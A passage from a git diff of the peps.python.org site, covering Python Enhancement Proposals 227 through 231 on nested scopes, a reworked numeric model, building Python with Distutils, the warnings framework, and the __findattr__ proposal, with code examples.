There are two kinds of compatibility problems caused by nested +scopes. In one case, code that behaved one way in earlier +versions behaves differently because of nested scopes. In the +other case, certain constructs interact badly with nested scopes +and will trigger SyntaxErrors at compile time.

+

The following example from Skip Montanaro illustrates the first +kind of problem:

+
x = 1
+def f1():
+    x = 2
+    def inner():
+        print x
+    inner()
+
+
+

Under the Python 2.0 rules, the print statement inside inner() +refers to the global variable x and will print 1 if f1() is +called. Under the new rules, it refers to f1()’s namespace, +the nearest enclosing scope with a binding.

+

The problem occurs only when a global variable and a local +variable share the same name and a nested function uses that name +to refer to the global variable. This is poor programming +practice, because readers will easily confuse the two different +variables. One example of this problem was found in the Python +standard library during the implementation of nested scopes.

+

To address this problem, which is unlikely to occur often, the +Python 2.1 compiler (when nested scopes are not enabled) issues a +warning.

+

The other compatibility problem is caused by the use of import * +and ‘exec’ in a function body, when that function contains a +nested scope and the contained scope has free variables. For +example:

+
y = 1
+def f():
+    exec "y = 'gotcha'" # or from module import *
+    def g():
+        return y
+    ...
+
+
+

At compile-time, the compiler cannot tell whether an exec that +operates on the local namespace or an import * will introduce +name bindings that shadow the global y. Thus, it is not possible +to tell whether the reference to y in g() should refer to the +global or to a local name in f().

+

In discussion on the python-list, people argued for both possible +interpretations. On the one hand, some thought that the reference +in g() should be bound to a local y if one exists. One problem +with this interpretation is that it is impossible for a human +reader of the code to determine the binding of y by local +inspection. It seems likely to introduce subtle bugs. The other +interpretation is to treat exec and import * as dynamic features +that do not affect static scoping. Under this interpretation, the +exec and import * would introduce local names, but those names +would never be visible to nested scopes. In the specific example +above, the code would behave exactly as it did in earlier versions +of Python.

+

Since each interpretation is problematic and the exact meaning is +ambiguous, the compiler raises an exception. The Python 2.1 +compiler issues a warning when nested scopes are not enabled.

+

A brief review of three Python projects (the standard library, +Zope, and a beta version of PyXPCOM) found four backwards +compatibility issues in approximately 200,000 lines of code. +There was one example of case #1 (subtle behavior change) and two +examples of import * problems in the standard library.

+

(The interpretation of the import * and exec restriction that was +implemented in Python 2.1a2 was much more restrictive, based on +language in the reference manual that had never been +enforced. These restrictions were relaxed following the release.)

+
+
+

Compatibility of C API

+

The implementation causes several Python C API functions to +change, including PyCode_New(). As a result, C extensions may +need to be updated to work correctly with Python 2.1.

+
+
+

locals() / vars()

+

These functions return a dictionary containing the current scope’s +local variables. Modifications to the dictionary do not affect +the values of variables. Under the current rules, the use of +locals() and globals() allows the program to gain access to all +the namespaces in which names are resolved.

+

An analogous function will not be provided for nested scopes. +Under this proposal, it will not be possible to gain +dictionary-style access to all visible scopes.

+
+
+

Warnings and Errors

+

The compiler will issue warnings in Python 2.1 to help identify +programs that may not compile or run correctly under future +versions of Python. Under Python 2.2, or under Python 2.1 if the +nested_scopes future statement is used (collectively +referred to as “future semantics” in this section), the compiler +will issue SyntaxErrors in some cases.

+

The warnings typically apply when a function contains a +nested function that has free variables. For example, if function +F contains a function G and G uses the builtin len(), then F is a +function that contains a nested function (G) with a free variable +(len). The label “free-in-nested” will be used to describe these +functions.

+
+

import * used in function scope

+

The language reference specifies that import * may only occur +in a module scope. (Sec. 6.11) The implementation of C +Python has supported import * at the function scope.

+

If import * is used in the body of a free-in-nested function, +the compiler will issue a warning. Under future semantics, +the compiler will raise a SyntaxError.

+
+
+

bare exec in function scope

+

The exec statement allows two optional expressions following +the keyword “in” that specify the namespaces used for locals +and globals. An exec statement that omits both of these +namespaces is a bare exec.

+

If a bare exec is used in the body of a free-in-nested +function, the compiler will issue a warning. Under future +semantics, the compiler will raise a SyntaxError.

+
+
+

local shadows global

+

If a free-in-nested function has a binding for a local +variable that (1) is used in a nested function and (2) is the +same as a global variable, the compiler will issue a warning.

+
+
+

Rebinding names in enclosing scopes

+

There are technical issues that make it difficult to support +rebinding of names in enclosing scopes, but the primary reason +that it is not allowed in the current proposal is that Guido is +opposed to it. His motivation: it is difficult to support, +because it would require a new mechanism that would allow the +programmer to specify that an assignment in a block is supposed to +rebind the name in an enclosing block; presumably a keyword or +special syntax (x := 3) would make this possible. Given that this +would encourage the use of local variables to hold state that is +better stored in a class instance, it’s not worth adding new +syntax to make this possible (in Guido’s opinion).

+

The proposed rules allow programmers to achieve the effect of +rebinding, albeit awkwardly. The name that will be effectively +rebound by enclosed functions is bound to a container object. In +place of assignment, the program uses modification of the +container to achieve the desired effect:

+
def bank_account(initial_balance):
+    balance = [initial_balance]
+    def deposit(amount):
+        balance[0] = balance[0] + amount
+        return balance
+    def withdraw(amount):
+        balance[0] = balance[0] - amount
+        return balance
+    return deposit, withdraw
+
+
+

Support for rebinding in nested scopes would make this code +clearer. A class that defines deposit() and withdraw() methods +and the balance as an instance variable would be clearer still. +Since classes seem to achieve the same effect in a more +straightforward manner, they are preferred.

+
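For comparison, a sketch of the class-based version the text alludes to:

class BankAccount:
    def __init__(self, initial_balance):
        self.balance = initial_balance

    def deposit(self, amount):
        self.balance = self.balance + amount
        return self.balance

    def withdraw(self, amount):
        self.balance = self.balance - amount
        return self.balance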
+
+
+

Implementation

+

The implementation for C Python uses flat closures [1]. Each def +or lambda expression that is executed will create a closure if the +body of the function or any contained function has free +variables. Using flat closures, the creation of closures is +somewhat expensive but lookup is cheap.

+

The implementation adds several new opcodes and two new kinds of +names in code objects. A variable can be either a cell variable +or a free variable for a particular code object. A cell variable +is referenced by contained scopes; as a result, the function +where it is defined must allocate separate storage for it on each +invocation. A free variable is referenced via a function’s +closure.

+
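The two kinds of names can be observed from Python code (a sketch; the attribute is spelled func_closure in Python 2 and __closure__ in Python 3):

def outer():
    v = 42              # 'v' is a cell variable in outer's code object
    def inner():
        return v        # 'v' is a free variable in inner's code object
    return inner

f = outer()
assert f() == 42
assert len(f.func_closure) == 1   # one cell, holding the binding for v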

The choice of flat closures was based on three factors. +First, nested functions are presumed to be used infrequently, +and deeply nested functions (several levels of nesting) still less +frequently. Second, lookup of names in a nested scope should be fast. +Third, the use of nested scopes, particularly where a function +that accesses an enclosing scope is returned, should not prevent +unreferenced objects from being reclaimed by the garbage +collector.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0227.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0228/index.html b/pep-0228/index.html new file mode 100644 index 00000000000..edc15d72739 --- /dev/null +++ b/pep-0228/index.html @@ -0,0 +1,252 @@ + PEP 228 – Reworking Python’s Numeric Model | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 228 – Reworking Python’s Numeric Model

+
+
Author:
+
Moshe Zadka <moshez at zadka.site.co.il>, Guido van Rossum <guido at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
04-Nov-2000
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Withdrawal

+

This PEP has been withdrawn in favor of PEP 3141.

+
+
+

Abstract

+

Today, Python’s numerical model is similar to the C numeric model: +there are several unrelated numerical types, and when operations +between numerical types are requested, coercions happen. While +the C rationale for the numerical model is that it is very similar +to what happens at the hardware level, that rationale does not +apply to Python. So, while it is acceptable to C programmers that +2/3 == 0, it is surprising to many Python programmers.

+

NOTE: in the light of recent discussions in the newsgroup, the +motivation in this PEP (and details) need to be extended.

+
+
+

Rationale

+

In usability studies, one of the least usable aspects of Python was +the fact that integer division returns the floor of the division. +This makes it hard to program correctly, requiring casts to +float() at various points throughout the code. Python’s numerical +model stems from C, while a model that might be easier to work with +can be based on the mathematical understanding of numbers.

+
+
+

Other Numerical Models

+

Perl’s numerical model is that there is one type of numbers – +floating point numbers. While it is consistent and superficially +non-surprising, it tends to have subtle gotchas. One of these is +that printing numbers is very tricky, and requires correct +rounding. In Perl, there is also a mode where all numbers are +integers. This mode also has its share of problems, which arise +from the fact that there is not even an approximate way of +dividing numbers and getting meaningful answers.

+
+
+

Suggested Interface For Python’s Numerical Model

+

While coercion rules will remain for add-on types and classes, the +built-in type system will have exactly one Python type – a +number. There are several things which can be considered “number +methods”:

+
    +
  1. isnatural()
  2. isintegral()
  3. isrational()
  4. isreal()
  5. iscomplex()
  6. isexact()
+

Obviously, a number which answers true to a question from 1 to 5 will +also answer true to any following question. If isexact() is not true, +then any answer might be wrong. +(But not horribly wrong: it’s close to the truth.)

+
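A sketch of the implication chain, approximating two of the proposed predicates with today's types (isintegral and isrational here are hypothetical helpers, and the fractions module only appeared later, in Python 2.6):

from fractions import Fraction

def isintegral(x):
    return isinstance(x, int) or (isinstance(x, Fraction)
                                  and x.denominator == 1)

def isrational(x):
    # anything integral is also rational (item 2 implies item 3)
    return isintegral(x) or isinstance(x, Fraction)

assert isintegral(7) and isrational(7)
assert not isintegral(Fraction(2, 3)) and isrational(Fraction(2, 3))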

Now, there are two things the model promises for the field operations +(+, -, /, *):

+
    +
  • If both operands satisfy isexact(), the result satisfies +isexact().
  • +
  • All field rules are true, except that for not-isexact() numbers, +they might be only approximately true.
  • +
+

One consequence of these two rules is that all exact calculations +are done as (complex) rationals: since the field laws must hold, +then

+
(a/b)*b == a
+
+
+

must hold.

+
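The later fractions module (Python 2.6 and up) behaves like the exact numbers described here, so the consequence can be demonstrated with it (an illustration, not the proposed API):

from fractions import Fraction

a, b = Fraction(2), Fraction(3)
assert (a / b) * b == a            # the field law holds exactly
assert a / b == Fraction(2, 3)     # 2/3 stays a rational, not 0 and not a float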

There is a built-in function, inexact(), which takes a number +and returns an inexact number which is a good approximation. +Inexact numbers must be at least as accurate as if they were +using IEEE-754.

+

Several of the classical Python functions will return exact numbers +even when given inexact numbers: e.g., int().

+
+
+

Coercion

+

The number type does not define nb_coerce. +Any numeric operation slot, when receiving something other than PyNumber, +refuses to implement it.

+
+
+

Inexact Operations

+

The functions in the math module will be allowed to return +inexact results for exact values. However, they will never return +a non-real number. The functions in the cmath module are also +allowed to return an inexact result for an exact argument, and are +furthermore allowed to return a complex result for a real +argument.

+
+
+

Numerical Python Issues

+

People who use Numerical Python do so for high-performance vector +operations. Therefore, NumPy should keep its hardware based +numeric model.

+
+
+

Unresolved Issues

+

Which number literals will be exact, and which inexact?

+

How do we deal with IEEE 754 operations? (probably, isnan/isinf should +be methods)

+

On 64-bit machines, comparisons between ints and floats may be +broken when the comparison involves conversion to float. Ditto +for comparisons between longs and floats. This can be dealt with +by avoiding the conversion to float. (Due to Andrew Koenig.)

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0228.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0229/index.html b/pep-0229/index.html new file mode 100644 index 00000000000..698a623cc40 --- /dev/null +++ b/pep-0229/index.html @@ -0,0 +1,220 @@ + PEP 229 – Using Distutils to Build Python | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 229 – Using Distutils to Build Python

+
+
Author:
+
A.M. Kuchling <amk at amk.ca>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
16-Nov-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Introduction

+

The Modules/Setup mechanism has some flaws:

+
    +
  • People have to remember to uncomment bits of Modules/Setup in +order to get all the possible modules.
  • +
  • Moving Setup to a new version of Python is tedious; new modules +have been added, so you can’t just copy the older version, but +have to reconcile the two versions.
  • +
  • Users have to figure out where the needed libraries, such as +zlib, are installed.
  • +
+
+
+

Proposal

+

Use the Distutils to build the modules that come with Python.

+

The changes can be broken up into several pieces:

+
    +
  1. The Distutils needs some Python modules to be able to build +modules. Currently I believe the minimal list is posix, _sre, +and string.

    These modules will have to be built before the Distutils can be +used, so they’ll simply be hardwired into Modules/Makefile and +be automatically built.

    +
  2. A top-level setup.py script will be written that checks the +libraries installed on the system and compiles as many modules +as possible.
  3. Modules/Setup will be kept and settings in it will override +setup.py’s usual behavior, so you can disable a module known +to be buggy, or specify particular compilation or linker flags. +However, in the common case where setup.py works correctly, +everything in Setup will remain commented out. The other +Setup.* files become unnecessary, since nothing will be generating +Setup automatically.
  +
+

The patch was checked in for Python 2.1, and has been subsequently +modified.

+
+
+

Implementation

+

Patch #102588 on SourceForge contains the proposed patch. +Currently the patch tries to be conservative and to change as few +files as possible, in order to simplify backing out the patch. +For example, no attempt is made to rip out the existing build +mechanisms. Such simplifications can wait for later in the beta +cycle, when we’re certain the patch will be left in, or they can +wait for Python 2.2.

+

The patch makes the following changes:

+
    +
  • Makes some required changes to distutils/sysconfig (these will +be checked in separately)
  • +
  • In the top-level Makefile.in, the “sharedmods” target simply +runs "./python setup.py build", and “sharedinstall” runs +"./python setup.py install". The “clobber” target also deletes +the build/ subdirectory where Distutils puts its output.
  • +
  • Modules/Setup.config.in only contains entries for the gc and thread +modules; the readline, curses, and db modules are removed because +it’s now setup.py’s job to handle them.
  • +
  • Modules/Setup.dist now contains entries for only 3 modules – +_sre, posix, and strop.
  • +
  • The configure script builds setup.cfg from setup.cfg.in. This +is needed for two reasons: to make building in subdirectories +work, and to get the configured installation prefix.
  • +
  • Adds setup.py to the top directory of the source tree. setup.py +is the largest piece of the puzzle, though not the most +complicated. setup.py contains a subclass of the BuildExt +class, and extends it with a detect_modules() method that does +the work of figuring out which modules can be compiled, and adding +them to the ‘exts’ list; a sketch of this idea follows the list.
  • +
+
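A sketch of the detection idea from the last bullet (a hypothetical helper; the real setup.py logic is more involved):

from distutils.core import Extension
import os.path

def detect_zlib(exts, lib_dirs=('/usr/lib', '/usr/local/lib')):
    # add the zlib extension only if the library appears to be installed
    for d in lib_dirs:
        if os.path.exists(os.path.join(d, 'libz.so')):
            exts.append(Extension('zlib', ['zlibmodule.c'],
                                  libraries=['z']))
            return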
+
+

Unresolved Issues

+

Do we need to make it possible to disable the 3 hard-wired modules +without manually hacking the Makefiles? [Answer: No.]

+

The Distutils always compile modules as shared libraries. How do +we support compiling them statically into the resulting Python +binary?

+

[Answer: building a Python binary with the Distutils should be +feasible, though no one has implemented it yet. This should be +done someday, but isn’t a pressing priority as messing around with +the top-level Makefile.pre.in is good enough.]

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0229.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0230/index.html b/pep-0230/index.html new file mode 100644 index 00000000000..1f3a2d6929f --- /dev/null +++ b/pep-0230/index.html @@ -0,0 +1,454 @@ + PEP 230 – Warning Framework | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 230 – Warning Framework

+
+
Author:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
28-Nov-2000
+
Python-Version:
+
2.1
+
Post-History:
+
05-Nov-2000
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a C and Python level API, as well as command +line flags, to issue warning messages and control what happens to +them. This is mostly based on GvR’s proposal posted to python-dev +on 05-Nov-2000, with some ideas (such as using classes to +categorize warnings) merged in from Paul Prescod’s +counter-proposal posted on the same date. Also, an attempt to +implement the proposal caused several small tweaks.

+
+
+

Motivation

+

With Python 3000 looming, it is necessary to start issuing +warnings about the use of obsolete or deprecated features, in +addition to errors. There are also lots of other reasons to be +able to issue warnings, both from C and from Python code, both at +compile time and at run time.

+

Warnings aren’t fatal, and thus it’s possible that a program +triggers the same warning many times during a single execution. +It would be annoying if a program emitted an endless stream of +identical warnings. Therefore, a mechanism is needed that +suppresses multiple identical warnings.

+

It is also desirable to have user control over which warnings are +printed. While in general it is useful to see all warnings all +the time, there may be times where it is impractical to fix the +code right away in a production program. In this case, there +should be a way to suppress warnings.

+

It is also useful to be able to suppress specific warnings during +program development, e.g. when a warning is generated by a piece +of 3rd party code that cannot be fixed right away, or when there +is no way to fix the code (possibly a warning message is generated +for a perfectly fine piece of code). It would be unwise to offer +to suppress all warnings in such cases: the developer would miss +warnings about the rest of the code.

+

On the other hand, there are also situations conceivable where +some or all warnings are better treated as errors. For example, +it may be a local coding standard that a particular deprecated +feature should not be used. In order to enforce this, it is +useful to be able to turn the warning about this particular +feature into an error, raising an exception (without necessarily +turning all warnings into errors).

+

Therefore, I propose to introduce a flexible “warning filter” +which can filter out warnings or change them into exceptions, +based on:

+
    +
  • Where in the code they are generated (per package, module, or +function)
  • +
  • The warning category (warning categories are discussed below)
  • +
  • A specific warning message
  • +
+

The warning filter must be controllable both from the command line +and from Python code.

+
+
+

APIs For Issuing Warnings

+
    +
  • To issue a warning from Python:
    import warnings
    +warnings.warn(message[, category[, stacklevel]])
    +
    +
    +

    The category argument, if given, must be a warning category +class (see below); it defaults to warnings.UserWarning. This +may raise an exception if the particular warning issued is +changed into an error by the warnings filter. The stacklevel +can be used by wrapper functions written in Python, like this:

    +
from warnings import warn
+
+def deprecation(message):
+    warn(message, DeprecationWarning, stacklevel=2)
    +
    +
    +

This makes the warning refer to deprecation()’s caller, +rather than to the source of deprecation() itself (since the +latter would defeat the purpose of the warning message).

    +
  • +
  • To issue a warning from C:
    int PyErr_Warn(PyObject *category, char *message);
    +
    +
    +

Return 0 normally, 1 if an exception is raised (either because +the warning was transformed into an exception, or because of a +malfunction in the implementation, such as running out of +memory). The category argument must be a warning category class +(see below) or NULL, in which case it defaults to +PyExc_RuntimeWarning. When the PyErr_Warn() function returns 1, the +caller should do normal exception handling.

    +

    The current C implementation of PyErr_Warn() imports the +warnings module (implemented in Python) and calls its warn() +function. This minimizes the amount of C code that needs to be +added to implement the warning feature.

    +

    [XXX Open Issue: what about issuing warnings during lexing or +parsing, which don’t have the exception machinery available?]

    +
  • +
+
+
+

Warnings Categories

+

There are a number of built-in exceptions that represent warning +categories. This categorization is useful to be able to filter +out groups of warnings. The following warnings category classes +are currently defined:

+
    +
  • Warning – this is the base class of all warning category +classes and is itself a subclass of Exception
  • +
  • UserWarning – the default category for warnings.warn()
  • +
  • DeprecationWarning – base category for warnings about deprecated +features
  • +
  • SyntaxWarning – base category for warnings about dubious +syntactic features
  • +
  • RuntimeWarning – base category for warnings about dubious +runtime features
  • +
+

[XXX: Other warning categories may be proposed during the review +period for this PEP.]

+

These standard warning categories are available from C as +PyExc_Warning, PyExc_UserWarning, etc. From Python, they are +available in the __builtin__ module, so no import is necessary.

+

User code can define additional warning categories by subclassing +one of the standard warning categories. A warning category must +always be a subclass of the Warning class.

+
+
+

The Warnings Filter

+

The warnings filter controls whether warnings are ignored, +displayed, or turned into errors (raising an exception).

+

There are three sides to the warnings filter:

+
    +
  • The data structures used to efficiently determine the +disposition of a particular warnings.warn() or PyErr_Warn() +call.
  • +
  • The API to control the filter from Python source code.
  • +
  • The command line switches to control the filter.
  • +
+

The warnings filter works in several stages. It is optimized for +the (expected to be common) case where the same warning is issued +from the same place in the code over and over.

+

First, the warning filter collects the module and line number +where the warning is issued; this information is readily available +through sys._getframe().

+

Conceptually, the warnings filter maintains an ordered list of +filter specifications; any specific warning is matched against +each filter specification in the list in turn until a match is +found; the match determines the disposition of the warning. Each +entry is a tuple as follows:

+
(category, message, module, lineno, action)
+
+
+
    +
  • category is a class (a subclass of warnings.Warning) of which +the warning category must be a subclass in order to match
  • +
  • message is a compiled regular expression that the warning +message must match (the match is case-insensitive)
  • +
  • module is a compiled regular expression that the module name +must match
  • +
  • lineno is an integer that the line number where the warning +occurred must match, or 0 to match all line numbers
  • +
  • action is one of the following strings:
      +
    • “error” – turn matching warnings into exceptions
    • +
    • “ignore” – never print matching warnings
    • +
    • “always” – always print matching warnings
    • +
    • “default” – print the first occurrence of matching warnings +for each location where the warning is issued
    • +
    • “module” – print the first occurrence of matching warnings +for each module where the warning is issued
    • +
    • “once” – print only the first occurrence of matching +warnings
    • +
    +
  • +
+
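A minimal sketch of the first-match lookup over such a list (a hypothetical helper; the real warnings module differs in detail):

def find_action(filters, category, message, module, lineno):
    # filters holds (category, message_re, module_re, lineno, action)
    # tuples, with the regular expressions already compiled
    for cat, msg_re, mod_re, ln, action in filters:
        if (issubclass(category, cat)
                and msg_re.match(message)
                and mod_re.match(module)
                and ln in (0, lineno)):
            return action
    return 'default'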

Since the Warning class is derived from the built-in Exception +class, to turn a warning into an error we simply raise +category(message).

+
+
+

Warnings Output And Formatting Hooks

+

When the warnings filter decides to issue a warning (but not when +it decides to raise an exception), it passes the information to +the function warnings.showwarning(message, category, filename, lineno). +The default implementation of this function writes the warning text +to sys.stderr, and shows the source line of the filename. It has +an optional 5th argument which can be used to specify a different +file than sys.stderr.

+

The formatting of warnings is done by a separate function, +warnings.formatwarning(message, category, filename, lineno). This +returns a string (that may contain newlines and ends in a newline) +that can be printed to get the identical effect of the +showwarning() function.

+
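A sketch of a formatwarning()-style function honoring that contract (the default implementation also appends the source line itself):

def formatwarning(message, category, filename, lineno):
    # returns a printable string ending in a newline
    return '%s:%d: %s: %s\n' % (filename, lineno,
                                category.__name__, message)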
+
+

API For Manipulating Warning Filters

+
warnings.filterwarnings(message, category, module, lineno, action)
+
+
+

This checks the types of the arguments, compiles the message and +module regular expressions, and inserts them as a tuple in front +of the warnings filter.

+
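A sketch of that behavior, using the argument order given above (the message pattern is compiled case-insensitively, per the filter specification):

import re

_filters = []   # the ordered filter list described earlier

def filterwarnings(message, category, module, lineno, action):
    assert action in ('error', 'ignore', 'always',
                      'default', 'module', 'once')
    _filters.insert(0, (category, re.compile(message, re.I),
                        re.compile(module), lineno, action))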
warnings.resetwarnings()
+
+
+

Reset the warnings filter to empty.

+
+
+

Command Line Syntax

+

There should be command line options to specify the most common +filtering actions, which I expect to include at least:

+
    +
  • suppress all warnings
  • +
  • suppress a particular warning message everywhere
  • +
  • suppress all warnings in a particular module
  • +
  • turn all warnings into exceptions
  • +
+

I propose the following command line option syntax:

+
-Waction[:message[:category[:module[:lineno]]]]
+
+
+

Where:

+
    +
  • ‘action’ is an abbreviation of one of the allowed actions +(“error”, “default”, “ignore”, “always”, “once”, or “module”)
  • +
  • ‘message’ is a message string; matches warnings whose message +text is an initial substring of ‘message’ (matching is +case-insensitive)
  • +
  • ‘category’ is an abbreviation of a standard warning category +class name or a fully-qualified name for a user-defined +warning category class of the form [package.]module.classname
  • +
  • ‘module’ is a module name (possibly package.module)
  • +
  • ‘lineno’ is an integral line number
  • +
+

All parts except ‘action’ may be omitted, where an empty value +after stripping whitespace is the same as an omitted value.

+

The C code that parses the Python command line saves the body of +all -W options in a list of strings, which is made available to +the warnings module as sys.warnoptions. The warnings module +parses these when it is first imported. Errors detected during +the parsing of sys.warnoptions are not fatal; a message is written +to sys.stderr and processing continues with the option.

+

Examples:

+
+
-Werror
Turn all warnings into errors
+
-Wall
Show all warnings
+
-Wignore
Ignore all warnings
+
-Wi:hello
Ignore warnings whose message text starts with “hello”
+
-We::Deprecation
Turn deprecation warnings into errors
+
-Wi:::spam:10
Ignore all warnings on line 10 of module spam
+
-Wi:::spam -Wd:::spam:10
Ignore all warnings in module spam except on line 10
+
-We::Deprecation -Wd::Deprecation:spam
Turn deprecation warnings into errors except in module spam
+
+
+
+

Open Issues

+

Some open issues off the top of my head:

+
    +
  • What about issuing warnings during lexing or parsing, which +don’t have the exception machinery available?
  • +
  • The proposed command line syntax is a bit ugly (although the +simple cases aren’t so bad: -Werror, -Wignore, etc.). Anybody +got a better idea?
  • +
  • I’m a bit worried that the filter specifications are too +complex. Perhaps filtering only on category and module (not on +message text and line number) would be enough?
  • +
  • There’s a bit of confusion between module names and file names. +The reporting uses file names, but the filter specification uses +module names. Maybe it should allow filenames as well?
  • +
  • I’m not at all convinced that packages are handled right.
  • +
  • Do we need more standard warning categories? Fewer?
  • +
  • In order to minimize the start-up overhead, the warnings module +is imported by the first call to PyErr_Warn(). It does the +command line parsing for -W options upon import. Therefore, it +is possible that warning-free programs will not complain about +invalid -W options.
  • +
+
+
+

Rejected Concerns

+

Paul Prescod, Barry Warsaw and Fred Drake have brought up several +additional concerns that I feel aren’t critical. I address them +here (the concerns are paraphrased, not exactly their words):

+
    +
  • Paul: warn() should be a built-in or a statement to make it easily +available.

    Response: “from warnings import warn” is easy enough.

    +
  • +
  • Paul: What if I have a speed-critical module that triggers +warnings in an inner loop. It should be possible to disable the +overhead for detecting the warning (not just suppress the +warning).

    Response: rewrite the inner loop to avoid triggering the +warning.

    +
  • +
  • Paul: What if I want to see the full context of a warning?

    Response: use -Werror to turn it into an exception.

    +
  • +
  • Paul: I prefer “:*:*:” to “:::” for leaving parts of the warning +spec out.

    Response: I don’t.

    +
  • +
  • Barry: It would be nice if lineno can be a range specification.

    Response: Too much complexity already.

    +
  • +
  • Barry: I’d like to add my own warning action. Maybe if ‘action’ +could be a callable as well as a string. Then in my IDE, I +could set that to “mygui.popupWarningsDialog”.

Response: For that purpose you would override +warnings.showwarning() (see the sketch after this list).

    +
  • +
  • Fred: why do the Warning category classes have to be in +__builtin__?

    Response: that’s the simplest implementation, given that the +warning categories must be available in C before the first +PyErr_Warn() call, which imports the warnings module. I see no +problem with making them available as built-ins.

    +
  • +
+
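For Barry's IDE scenario above, the override might look like this sketch (mygui stands in for a hypothetical GUI toolkit, as in the quoted response):

import warnings

class _FakeGui:
    # stand-in for the IDE's toolkit
    def popupWarningsDialog(self, *args):
        print args

mygui = _FakeGui()

def gui_showwarning(message, category, filename, lineno, file=None):
    mygui.popupWarningsDialog(message, category, filename, lineno)

warnings.showwarning = gui_showwarning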
+
+

Implementation

+

Here’s a prototype implementation: +http://sourceforge.net/patch/?func=detailpatch&patch_id=102715&group_id=5470

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0230.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0231/index.html b/pep-0231/index.html new file mode 100644 index 00000000000..165b9ecfdaa --- /dev/null +++ b/pep-0231/index.html @@ -0,0 +1,752 @@ + PEP 231 – __findattr__() | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 231 – __findattr__()

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
30-Nov-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Introduction

+

This PEP describes an extension to instance attribute lookup and +modification machinery, which allows pure-Python implementations +of many interesting programming models. This PEP tracks the +status and ownership of this feature. It contains a description +of the feature and outlines changes necessary to support the +feature. This PEP summarizes discussions held in mailing list +forums, and provides URLs for further information, where +appropriate. The CVS revision history of this file contains the +definitive historical record.

+
+
+

Background

+

The semantics for Python instances allow the programmer to +customize some aspects of attribute lookup and attribute +modification, through the special methods __getattr__() and +__setattr__() [1].

+

However, because of certain restrictions imposed by these methods, +there are useful programming techniques that cannot be written in +Python alone, e.g. strict Java Bean-like [2] interfaces and Zope +style acquisitions [3]. In the latter case, Zope solves this by +including a C extension called ExtensionClass [5] which modifies +the standard class semantics, and uses a metaclass hook in +Python’s class model called alternatively the “Don Beaudry Hook” +or “Don Beaudry Hack” [6].

+

While Zope’s approach works, it has several disadvantages. First, +it requires a C extension. Second it employs a very arcane, but +truck-sized loophole in the Python machinery. Third, it can be +difficult for other programmers to use and understand (the +metaclass has well-known brain exploding properties). And fourth, +because ExtensionClass instances aren’t “real” Python instances, +some aspects of the Python runtime system don’t work with +ExtensionClass instances.

+

Proposals for fixing this problem have often been lumped under the +rubric of fixing the “class/type dichotomy”; that is, eliminating +the difference between built-in types and classes [7]. While a +laudable goal itself, repairing this rift is not necessary in +order to achieve the types of programming constructs described +above. This proposal provides an 80% solution with a minimum of +modification to Python’s class and instance objects. It does +nothing to address the type/class dichotomy.

+
+
+

Proposal

+

This proposal adds a new special method called __findattr__() with +the following semantics:

+
    +
  • If defined in a class, it will be called on all instance +attribute resolutions instead of __getattr__() and +__setattr__().
  • +
  • __findattr__() is never called recursively. That is, when a +specific instance’s __findattr__() is on the call stack, further +attribute accesses for that instance will use the standard +__getattr__() and __setattr__() methods.
  • +
  • __findattr__() is called for both attribute access (‘getting’) +and attribute modification (‘setting’). It is not called for +attribute deletion.
  • +
  • When called for getting, it is passed a single argument (not +counting ‘self’): the name of the attribute being accessed.
  • +
  • When called for setting, it is called with a third argument, which +is the value to set the attribute to.
  • +
  • __findattr__() methods have the same caching semantics as +__getattr__() and __setattr__(); i.e. if they are present in the +class at class definition time, they are used, but if they are +subsequently added to a class later they are not.
  • +
+
+
+

Key Differences with the Existing Protocol

+

__findattr__()’s semantics are different from the existing +protocol in key ways:

+

First, __getattr__() is never called if the attribute is found in +the instance’s __dict__. This is done for efficiency reasons, and +because otherwise, __setattr__() would have no way to get to the +instance’s attributes.

+

Second, __setattr__() cannot use “normal” syntax for setting +instance attributes, e.g. “self.name = foo” because that would +cause recursive calls to __setattr__().

+
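The classic illustration of the second point:

class Example:
    def __setattr__(self, name, value):
        # 'self.name = value' here would call __setattr__ again and
        # recurse forever; the instance dictionary is written directly
        self.__dict__[name] = value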

__findattr__() is always called regardless of whether the +attribute is in __dict__ or not, and a flag in the instance object +prevents recursive calls to __findattr__(). This gives the class +a chance to perform some action for every attribute access. And +because it is called for both gets and sets, it is easy to write +similar policy for all attribute access. Further, efficiency is +not a problem because it is only paid when the extended mechanism +is used.

+
+ +
+

Examples

+

One programming style that this proposal allows is a Java +Bean-like interface to objects, where unadorned attribute access +and modification is transparently mapped to a functional +interface. E.g.

+
class Bean:
+    def __init__(self, x):
+        self.__myfoo = x
+
+    def __findattr__(self, name, *args):
+        if name.startswith('_'):
+            # Private names
+            if args: setattr(self, name, args[0])
+            else:    return getattr(self, name)
+        else:
+            # Public names
+            if args: name = '_set_' + name
+            else:    name = '_get_' + name
+            return getattr(self, name)(*args)
+
+    def _set_foo(self, x):
+        self.__myfoo = x
+
+    def _get_foo(self):
+        return self.__myfoo
+
+
+b = Bean(3)
+print b.foo
+b.foo = 9
+print b.foo
+
+
+

